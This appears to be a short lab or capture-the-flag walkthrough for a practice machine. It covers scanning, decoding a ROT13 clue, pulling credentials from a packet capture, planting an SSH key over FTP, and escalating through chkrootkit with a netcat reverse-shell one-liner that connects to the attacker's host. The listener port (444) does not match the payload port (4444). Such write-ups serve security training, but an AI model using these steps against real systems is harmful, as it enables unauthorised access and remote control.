We start scanning the host with nmap –A –T4 –p- 192.168.1.9 –vv
Running dirb of the host came with directories and a text file
The text file contain the word nfubxn.cpncat , it make no sense but if we go to the website https://rot13.com/ you can convert it something else ashoka.pcapng , a file which we can view in Tshark or TCPDump >> tcpick -C -yP –r ashoka.pcapng
Now we have a username ashoka and password kautilya
We create a .ssh folder and transfer our authorized_keys from our ssh folder using the PUT command, on the host ftp service:
Mkdir .ssh
Cd /.ssh
On our machine:
Ssh-keygen
cat id_rsa.pub > authorized_keys
cp authorized_keys /root/
On the host :
Put authorized_keys
Now out of the ftp and login to ssh
In tmp folder there is a log file , reading it can tell it’s a Chkrootkit which we can exploit using:
echo ‘#!/bin/bash’ > update
echo ‘rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.11 4444 >/tmp/f’ >> update
chmod 777 update
./update
open a connection on you machine using nc –lvp 444
